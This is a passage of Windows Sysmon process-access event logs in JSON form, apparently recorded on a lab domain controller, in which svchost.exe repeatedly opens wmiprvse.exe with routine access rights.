07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1047,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.909\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.909","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1048,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.909\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.909","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1049,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.909\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.909","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1050,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.909\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.909","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1051,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.909\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.909","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1052,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.909\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.909","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1053,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1054,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
